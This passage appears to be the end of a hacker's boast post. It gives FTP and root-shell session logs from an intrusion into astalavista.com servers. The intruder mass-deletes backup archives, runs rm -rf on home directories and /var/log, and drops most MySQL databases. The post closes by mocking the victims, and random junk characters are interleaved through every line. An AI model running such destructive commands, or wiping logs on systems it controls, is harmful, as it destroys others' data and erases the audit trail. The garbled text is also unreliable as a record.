Using binary mode to transfer files.% o$ q4 m& G& [
ftp> ls -la
+ t" S! B& Z/ m' }227 Entering Passive Mode (212,254,194,163,2,188) O& I! S: Z; F$ a
150 Opening BINARY mode data connection for ‘file list’.% I+ E' X9 c' X* m- h) @) v) U
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
7 c9 h* g* q; N0 W8 t; b226 Transfer complete.
5 s/ b: v( w! v6 L Sftp> cd astalavista.com/ N& `1 Q. y( P0 t
250 CWD command successful.; z3 w. x) Y) a8 \. h2 Z9 B5 D
ftp> ls -la
, Q$ P3 b2 i {! ^; a8 U1 i" \/ v227 Entering Passive Mode (212,254,194,163,2,189)
/ ?" O6 z+ W! {: @: `9 d150 Opening BINARY mode data connection for ‘file list’.
6 o% {8 d2 M# A4 X* H, f-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
o# _' w( T2 F/ k+ o- R4 a! L) u3 M-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
+ r" l6 c0 u6 k* V8 B) D-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz29 K. z9 x% H) i5 c8 ]2 i" |4 Y
-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar
1 v7 B9 {; h/ b# a; E3 n6 x-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar) e2 ~# Z1 w: `2 d: e* {+ Z
[snip]
, C0 L: `* }4 A) x! W% X8 \3 X226 Transfer complete." b$ ^( C0 ?4 ^1 ]1 w' r
ftp> mdelete *5 w; e7 W3 ]" Z& I: I0 C" e3 F9 {
ftp> ls -la1 Y1 Z& r2 z+ ]
227 Entering Passive Mode (212,254,194,163,2,193)
$ y" g. T+ q; m0 Q. N' B: ]( j150 Opening BINARY mode data connection for ‘file list’.$ W' k" w: Q7 K5 ^" T* E) K
226 Transfer complete.! `; w2 H c2 @: O% ~
ftp>7 r6 l9 y, F% y
' w( C3 N% M3 X* A/ }+ bsh-3.2# cd /home
1 _: A) ~- K: t jsh-3.2# ls -la
) F; K2 Y, v Stotal 120 S+ k; Q& F0 K* o1 I
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
& Y+ W! z `; N+ B' S* X6 ^drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..- r) J1 h0 E; D* F1 T6 f6 j
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin
. b0 [( s4 g b( ]; o; [-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
+ u% D" N& @% Y' W6 L6 q: \+ I S. h-rw——- 1 root root 8192 Jun 3 02:45 aquota.user6 [# u0 S4 {( K1 X e
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet) k; D [0 y5 I, I8 F1 c& }
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup* [; @, E% y6 \/ j# C: T, N
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
, [* c+ t' w( z u7 \$ e6 udrwx–x–x 10 com com 4096 Apr 28 12:40 com' @8 E: ^* F' Y7 g T# j$ a& A
drwxr-xr-x 2 root root 4096 May 17 2007 ftp
3 F9 s% s+ Q# {- L; |" \# A( r mdrwx—— 3 jon jon 4096 Sep 21 2007 jon
' K+ L3 }$ z/ B0 `1 ^, ?drwx—— 2 root root 16384 Sep 11 2007 lost+found
. [4 {. r' I/ M8 P: ndrwxr-xr-x 2 root root 4096 Sep 14 2007 my
& c8 c3 [8 p! R1 t; I7 Xdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
& j8 s5 V, [. cdrwx—— 2 jon jon 4096 Sep 15 2007 test
4 s7 ?; Q6 c4 h( V& xdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp; P% K! X: N5 b/ I9 f( b
" ], Y c# M3 l
sh-3.2# rm -rf backup/4 U$ Q9 B; W1 n# N( r
sh-3.2# rm -rf backup.14161/( A; b9 J/ T+ T' i) m
sh-3.2# rm -rf ftp/
7 ~0 B6 o, w& o) A; gsh-3.2# rm -rf jon/
1 H }+ r* H# S; S, \6 gsh-3.2# rm -rf my/
7 O( u. j; p, }0 b" Vsh-3.2# rm -rf mysqldata/) x8 P( r, V5 f' ^% A- n
sh-3.2# rm -rf test/0 R! ]1 b! P( r+ K: r+ ^
sh-3.2# rm -rf tmp/
$ ^' J b' e8 a8 o5 R1 _sh-3.2# cd ~
5 ]* M# ^- i1 ] R/ v9 p1 g) p9 jsh-3.2# rm -rf *
( j4 G7 X6 f5 l+ A5 Y! Ush-3.2# rm -rf /var/log/
. X8 K. \* P: \' B1 O/ o1 \rm: cannot remove directory `/var/log//proftpd’: Directory not empty
' m2 E- S, G m: m1 j. ?sh-3.2# rm -rf /home/*
. V( e% P/ @9 f, L, xsh-3.2# mysql2 V; Q' `1 N5 Z7 V4 ]% T6 J
Welcome to the MySQL monitor. Commands end with ; or \g.! B- [5 ?9 [+ W7 Q$ _$ B
Your MySQL connection id is 407156
/ M2 S A' b3 m+ R( d% n# ~Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ G5 S; O+ j6 U( b
, P7 j- p& [$ ^' S1 e1 fType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.2 b4 f/ R4 O+ k, O" `5 D
* ?) A# V! V; r3 r/ Kmysql> show databases;
# S( Y8 I* w) y% b# I+———————–+/ S9 p5 F% W! |. ]7 g
| Database |
6 L# v J9 k# B( f% D+———————–+
* O& d' ~/ b; X$ V* y' Q2 S+ W# a| information_schema |
8 ^2 a, k5 ^8 ]( i( S5 d, C| astanet_ads |
0 H9 W7 I8 s- |7 v! z5 X$ _| astanet_mailing_lists |
1 ^' Z, ?: _; I: {0 n7 s| astanet_mediawiki |/ I% c& p9 ~1 Z. n
| astanet_membersystem |: w+ O" O4 y: I. Z _# g
| com_contrexx |
. P6 k# t! q) Q7 @' \| com_contrexx2 |5 C. H3 E- P: i+ Z( A/ f
| com_contrexx2_live |
9 G: H! t! W% f. q, U4 R. t* U; x| da_roundcube |' D4 H5 |4 y* t% T; y- t
| dolphin |
! l4 l G6 `3 T3 t: s| ideapool |1 p0 a& i# _' e) ~% k5 M4 y
| mysql |
5 |* w# N0 h5 O; E0 @9 J| test |
$ G5 P$ M& r. h/ c| yourmaster |
8 P4 q. M6 D: b6 l2 T0 _+———————–+/ e# o$ l# J! F1 @% d
14 rows in set (0.03 sec)7 ?) J& u! `* ?! \+ {1 P
$ S1 l: [: E' [/ N3 a% kmysql> drop database astanet_membersystem;
}- n$ }0 T0 O. p! fdroQuery OK, 46 rows affected (0.81 sec)
% q6 j) P+ r$ U/ v5 o9 @) j4 {
. o u" g5 N: z( N- T% b( ?mysql> drop database com_contrexx;
) x4 S5 T& @4 M- UQuery OK, 211 rows affected (2.72 sec)
0 `# c* i- U4 z, j% Q+ @( `, Y7 u" l! B7 Q! Z3 F
mysql> drop database com_contrexx2; j" f9 ~3 k4 a! a) e8 `
Query OK, 237 rows affected (2.23 sec); x: a) {, W3 x2 v7 Q) U8 c* E
5 P2 G/ H# _7 P: `
mysql> drop database com_contrexx2_live;
8 B' d1 y, Z9 T1 C$ m9 jQuery OK, 227 rows affected (7.63 sec)) F( F4 Q1 K3 w5 ^; F9 \. S% h
1 W7 z: Z( s. z% P) D
mysql> drop database ideapool;1 R2 y. y7 F; x/ B
Query OK, 69 rows affected (0.19 sec), a! P- p3 [* @7 n# w
% d9 y( Z6 @% X" Z& L2 C6 p
mysql> drop database yourmaster;) U/ W% }. k2 ]% B/ _
Query OK, 158 rows affected (0.55 sec)$ o1 A. n9 ~! C( {
' Q! [4 K& K% E, Q' D/ t
mysql> drop database astanet_ads;3 I3 E! I; @ N& ]
Query OK, 9 rows affected (0.11 sec)2 A# k; o6 g V' k5 d
! b+ C/ M( f) W% b0 L
mysql> drop database astanet_mailing_lists;' q, Z8 z; N) l: c8 @
Query OK, 24 rows affected (1.47 sec)! t1 n: T: X" `' D
8 G) [( [# ]+ B. Jmysql> drop database astanet_mediawiki;2 ~5 u8 e. |% ]! ^- y- S8 X8 O
Query OK, 31 rows affected (0.51 sec)9 c2 P4 L! f2 P, Z8 }$ X2 ^4 i
4 W- E7 l/ z8 i( z! a9 ymysql> show databases;
9 g2 w! f5 i1 A8 Q& d" C: n/ w+——————–+
' M5 c6 f7 @8 Q* S% F5 E| Database |
6 b4 ?# z" g% H5 @+——————–+
5 d: t3 E" h; R, v) x6 d| information_schema |
9 b; x6 |! l I% Q| da_roundcube |6 y# E0 g2 q1 ~* V" h; N8 r
| dolphin |
4 k' N* O/ U7 |% ~ O4 q# q| mysql |: F ?/ X0 E" @( f, c% \! G
| test |" q: o: w f' Z! T: w3 t
+——————–+2 Y: d/ I8 ~6 M `! ]4 [
5 rows in set (0.00 sec)0 F* }1 Z4 M+ K! M% E% [& Q
9 R3 _& M/ R+ M. ?- g2 v0 Z u xWhat a journey! We’re not sure exactly why the “Terminator” had any influence on8 t+ i5 @9 o+ r; ?" y2 z
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the A8 ~0 T* r. [! L! C9 y3 ^" a
wrong to say this pack of morons *wont be back*.7 W' }3 T, t) ^- t/ v
|